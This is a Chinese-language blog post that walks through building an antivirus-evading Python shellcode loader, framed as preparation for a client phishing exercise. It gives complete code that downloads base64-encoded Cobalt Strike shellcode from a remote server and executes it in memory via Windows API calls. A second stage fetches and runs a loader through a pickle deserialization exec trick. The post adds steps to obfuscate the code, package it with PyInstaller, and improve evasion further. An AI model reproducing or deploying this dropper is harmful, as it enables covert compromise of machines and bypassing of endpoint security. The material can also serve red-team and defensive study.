<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Angleashuaiby">
    
    <title>
        
            python免杀shellcode加载器 |
        
        Angleashuaiby&#39;s note
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.jpg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"angleashuaiby.github.io","root":"/","language":"en","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066CC","avatar":"/images/touxiang.jpg","favicon":"/images/logo.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":false,"background_img":"/images/bg.svg","description":"站在巨人的肩膀上学习."},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":false}}},"local_search":{"enable":true,"preload":true},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":"0.0.1"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                Angleashuaiby&#39;s note
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">python免杀shellcode加载器</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/touxiang.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">Angleashuaiby</span>
                        
                            <span class="author-label">Lv1</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-07-04 18:05:09</span>
        <span class="mobile">2022-07-04 18:05</span>
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/">杂七杂八</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>1.3k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>5 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <p>.在真实的性命里，每桩伟业都由信心开始，并由信心跨出第一步。</p>
<span id="more"></span>

<h3 id="0、前言"><a href="#0、前言" class="headerlink" title="0、前言"></a>0、前言</h3><p>客户现场需要做钓鱼邮件演练。笔者在互联网上查找免杀方式的时候，发现了一个比较新颖的方法、在此记录。</p>
<p>主要参考文章为：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/m0_48108919/article/details/123599280" >CS结合python3混淆shellcode制作免杀脚本<i class="fas fa-external-link-alt"></i></a></p>
<p>具体实现流程：shellcode和加载器(pyminifier混淆后)经base64编码后，放远程服务器备用，然后目标主机远程下载两次。具体流程如图所示：</p>
<p><img src="https://s2.loli.net/2022/07/04/mP9Ua7KbIWuNkwF.png" alt="image-20220704170221389.png"></p>
<p>笔者在此基础上进行了代码分析以及补充了收集到的免杀技巧总结。</p>
<hr>
<h3 id="1、shellcode"><a href="#1、shellcode" class="headerlink" title="1、shellcode"></a>1、shellcode</h3><p>CS生成shellcode。把shellcode进行<strong>Base64编码</strong>后放在shellcode.txt里面并存放到服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x2c......</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="2、加载器"><a href="#2、加载器" class="headerlink" title="2、加载器"></a>2、加载器</h3><p>修改加载器的服务器地址后进行一次base64加密，然后把代码放在loader.txt里面并存放到服务器</p>
<h4 id="2-1-代码如下："><a href="#2-1-代码如下：" class="headerlink" title="2.1 代码如下："></a>2.1 代码如下：</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">import ctypes,urllib.request,codecs,base64</span><br><span class="line">shellcode = urllib.request.urlopen(&#x27;http://vps的ip地址/shellcode.txt&#x27;).read()</span><br><span class="line">shellcode = shellcode.strip()</span><br><span class="line">shellcode = base64.b64decode(shellcode)</span><br><span class="line">shellcode =codecs.escape_decode(shellcode)[0]</span><br><span class="line">shellcode = bytearray(shellcode)</span><br><span class="line">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br><span class="line">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))</span><br><span class="line">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br><span class="line">ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line">    ctypes.c_uint64(ptr),</span><br><span class="line">    buf,</span><br><span class="line">    ctypes.c_int(len(shellcode))</span><br><span class="line">)</span><br><span class="line">handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.c_uint64(ptr),</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.pointer(ctypes.c_int(0))</span><br><span class="line">)</span><br><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))</span><br></pre></td></tr></table></figure>

<h4 id="2-2-加载器代码解析："><a href="#2-2-加载器代码解析：" class="headerlink" title="2.2 加载器代码解析："></a>2.2 加载器代码解析：</h4><p>首先是获取shellcode的值，并进行base64解码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">shellcode = urllib.request.urlopen(&#x27;http://vps的ip地址/shellcode.txt&#x27;).read()</span><br><span class="line">shellcode = shellcode.strip()</span><br><span class="line">shellcode = base64.b64decode(shellcode)</span><br><span class="line">shellcode = base64.b64decode(shellcode)</span><br><span class="line">shellcode =codecs.escape_decode(shellcode)[0]</span><br></pre></td></tr></table></figure>

<p>设置<code>VirtualAlloc</code>返回类型为<code>ctypes.c_unit64</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br></pre></td></tr></table></figure>

<p>调用<code>VirtualAlloc</code>函数，来申请一块动态内存区域。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))</span><br></pre></td></tr></table></figure>

<blockquote>
<p> <code>VirtualAlloc</code>函数原型和参数如下：</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">LPVOID VirtualAlloc&#123;</span><br><span class="line">LPVOID lpAddress, #要分配的内存区域的地址</span><br><span class="line">DWORD dwSize,      #分配的大小</span><br><span class="line">DWORD flAllocationType, #分配的类型</span><br><span class="line">DWORD flProtect     #该内存的初始保护属性</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
</blockquote>
<p>将shellcode指向指针</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br></pre></td></tr></table></figure>

<p>调用<code>RtlMoveMemory</code>函数可以将shellcode载入内存。从指定内存地址将内容复制到我们申请的内存中去，shellcode字节多大就复制多大</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line">    ctypes.c_uint64(ptr),</span><br><span class="line">    buf,</span><br><span class="line">    ctypes.c_int(len(shellcode))</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>RtlMoveMemory</code>的原型和参数如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">RtlMoveMemory&#123;</span><br><span class="line">Destination,	#指向移动目的地址的指针。</span><br><span class="line">Source,		#指向要复制的内存地址的指针。</span><br><span class="line">Length		#指定要复制的字节数。</span><br><span class="line">&#125;; </span><br></pre></td></tr></table></figure>
</blockquote>
<p>调用 <code>CreateThread</code> 函数，完成shellcode注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.c_uint64(ptr),</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.c_int(0),</span><br><span class="line">    ctypes.pointer(ctypes.c_int(0))</span><br><span class="line">)</span><br><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>CreateThread</code>的原型和参数如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">HANDLE CreateThread(</span><br><span class="line">LPSECURITY_ATTRIBUTES lpThreadAttributes,#线程安全属性</span><br><span class="line">SIZE_T dwStackSize,       #置初始栈的大小，以字节为单位</span><br><span class="line">LPTHREAD_START_ROUTINE lpStartAddress,  #指向线程函数的指针</span><br><span class="line">LPVOID lpParameter,          #向线程函数传递的参数</span><br><span class="line">DWORD dwCreationFlags,       #线程创建属性</span><br><span class="line">LPDWORD lpThreadId           #保存新线程的id</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
</blockquote>
<p>等待线程结束调用<code>WaitForSingleObject</code>函数用来检测线程的状态</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>WaitForSingleObject</code>函数原型和参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">DWORD WINAPI WaitForSingleObject(</span><br><span class="line">__in HANDLE hHandle,     #对象句柄。可以指定一系列的对象</span><br><span class="line">__in DWORD dwMilliseconds  #定时时间间隔</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
</blockquote>
<hr>
<h3 id="3、主程序"><a href="#3、主程序" class="headerlink" title="3、主程序"></a>3、主程序</h3><p>zhu.py,最终在目标上执行的exe文件。</p>
<p>修改服务器地址后使用pyinstaller打包成exe可执行文件</p>
<h4 id="3-1-实现代码如下"><a href="#3-1-实现代码如下" class="headerlink" title="3.1 实现代码如下"></a>3.1 实现代码如下</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import ctypes,urllib.request,codecs,base64</span><br><span class="line">sectr = urllib.request.urlopen(&#x27;http://vps的ip地址/loader.txt&#x27;).read()</span><br><span class="line">sectr = base64.b64decode(sectr).decode(&quot;utf-8&quot;)</span><br><span class="line">class A(object):</span><br><span class="line">    def __reduce__(self):</span><br><span class="line">        return (exec, (sectr,))</span><br><span class="line">ret = pickle.dumps(A())</span><br><span class="line">ret_base64 = base64.b64encode(ret)</span><br><span class="line">ret_decode = base64.b64decode(ret_base64)</span><br><span class="line">pickle.loads(ret_decode)</span><br></pre></td></tr></table></figure>

<h4 id="3-2-代码解析"><a href="#3-2-代码解析" class="headerlink" title="3.2 代码解析"></a>3.2 代码解析</h4><p>先对Class A进行序列化，再对序列化的代码进行base64加密。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">class A(object):</span><br><span class="line">    ...</span><br><span class="line">ret = pickle.dumps(A())</span><br><span class="line">ret_base64 = base64.b64encode(ret)</span><br></pre></td></tr></table></figure>

<p>最后反序列化加载loader.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ret_decode = base64.b64decode(ret_base64)</span><br><span class="line">pickle.loads(ret_decode)</span><br></pre></td></tr></table></figure>

<p>通过__reduce__这个魔术方法执行了loader</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">def __reduce__(self):</span><br><span class="line">        return (exec, (sectr,))</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="4、其他免杀小技巧总结："><a href="#4、其他免杀小技巧总结：" class="headerlink" title="4、其他免杀小技巧总结："></a>4、其他免杀小技巧总结：</h3><h4 id="4-1-缩小和混淆py代码"><a href="#4-1-缩小和混淆py代码" class="headerlink" title="4.1 缩小和混淆py代码"></a>4.1 缩小和混淆py代码</h4><p>缩小python代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyminify zhu.py --output zhu_mini.py</span><br></pre></td></tr></table></figure>

<p>混淆main-mini.py中的python代码 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://pyob.oxyry.com/</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/07/04/gnzYJGToBZyDliC.png" alt="image-20220704164913232.png"></p>
<h4 id="4-2-Pyinstaller打包成可执行文件exe"><a href="#4-2-Pyinstaller打包成可执行文件exe" class="headerlink" title="4.2 Pyinstaller打包成可执行文件exe"></a>4.2 Pyinstaller打包成可执行文件exe</h4><p>将混淆后的代码保存到一个文件后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyinstaller.exe -Fw -i .\setting.ico --key=123456 .\final.py</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="五、免杀效果"><a href="#五、免杀效果" class="headerlink" title="五、免杀效果"></a>五、免杀效果</h3><p><img src="https://s2.loli.net/2022/07/04/qa2RJvmKMyTf1Dw.png" alt="image-20220704165438262.png"></p>
<p><img src="https://s2.loli.net/2022/07/04/USTwWM9amhsYP1D.png" alt="image-20220704165936231.png"></p>
<hr>
<h3 id="六、笔者总结："><a href="#六、笔者总结：" class="headerlink" title="六、笔者总结："></a>六、笔者总结：</h3><p>杀毒软件的原理一般是匹配特征码，行为监测，虚拟机（沙箱），内存查杀等。<strong>对抗特征码</strong>的检查的方式大致分为 <strong>混淆代码</strong> 与 <strong>编译代码</strong>。当下不仅<code>shellcode</code>作为特征码识别。加载器代码的部分代码也已经被当做特征码识别了。所以对加载器的各种处理也是必要的。</p>
<p>此文章的免杀的思路为：</p>
<ul>
<li>进行了Base64编码解码以及python的序列化与反序列化的绕过。</li>
<li>通过shellcode与加载器的分离。二次请求来进一步增加了静态免杀的概率。</li>
<li>与大佬进行讨论时：<strong>目前免杀用base64编码绕过较多，部分安全软件属实可以检测到。业内很少用加密绕过的。若用aes加密绕过，免杀效果更佳</strong>。</li>
</ul>
<hr>
<h3 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h3><ul>
<li><p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/m0_48108919/article/details/123599280" >CS结合python3混淆shellcode制作免杀脚本<i class="fas fa-external-link-alt"></i></a>。</p>
</li>
<li><p><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/270836.html" >Python简单免杀shellcode上线CS<i class="fas fa-external-link-alt"></i></a></p>
</li>
<li><p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/115283329" >python-shellcode加载器初体验<i class="fas fa-external-link-alt"></i></a></p>
</li>
</ul>

        </div>

        

        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/06/24/nps%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">nps内网穿透</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
            2022&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">Angleashuaiby</a>
        </div>
        
            <script async  src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                
            </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v0.0.1</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0%E3%80%81%E5%89%8D%E8%A8%80"><span class="nav-text">0、前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81shellcode"><span class="nav-text">1、shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81%E5%8A%A0%E8%BD%BD%E5%99%A8"><span class="nav-text">2、加载器</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-1-%E4%BB%A3%E7%A0%81%E5%A6%82%E4%B8%8B%EF%BC%9A"><span class="nav-text">2.1 代码如下：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2-%E5%8A%A0%E8%BD%BD%E5%99%A8%E4%BB%A3%E7%A0%81%E8%A7%A3%E6%9E%90%EF%BC%9A"><span class="nav-text">2.2 加载器代码解析：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81%E4%B8%BB%E7%A8%8B%E5%BA%8F"><span class="nav-text">3、主程序</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#3-1-%E5%AE%9E%E7%8E%B0%E4%BB%A3%E7%A0%81%E5%A6%82%E4%B8%8B"><span class="nav-text">3.1 实现代码如下</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-2-%E4%BB%A3%E7%A0%81%E8%A7%A3%E6%9E%90"><span class="nav-text">3.2 代码解析</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4%E3%80%81%E5%85%B6%E4%BB%96%E5%85%8D%E6%9D%80%E5%B0%8F%E6%8A%80%E5%B7%A7%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="nav-text">4、其他免杀小技巧总结：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#4-1-%E7%BC%A9%E5%B0%8F%E5%92%8C%E6%B7%B7%E6%B7%86py%E4%BB%A3%E7%A0%81"><span class="nav-text">4.1 缩小和混淆py代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-Pyinstaller%E6%89%93%E5%8C%85%E6%88%90%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6exe"><span class="nav-text">4.2 Pyinstaller打包成可执行文件exe</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BA%94%E3%80%81%E5%85%8D%E6%9D%80%E6%95%88%E6%9E%9C"><span class="nav-text">五、免杀效果</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%AD%E3%80%81%E7%AC%94%E8%80%85%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="nav-text">六、笔者总结：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="nav-text">参考链接：</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>



    
<script src="/js/local-search.js"></script>




    
<script src="/js/code-copy.js"></script>





<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
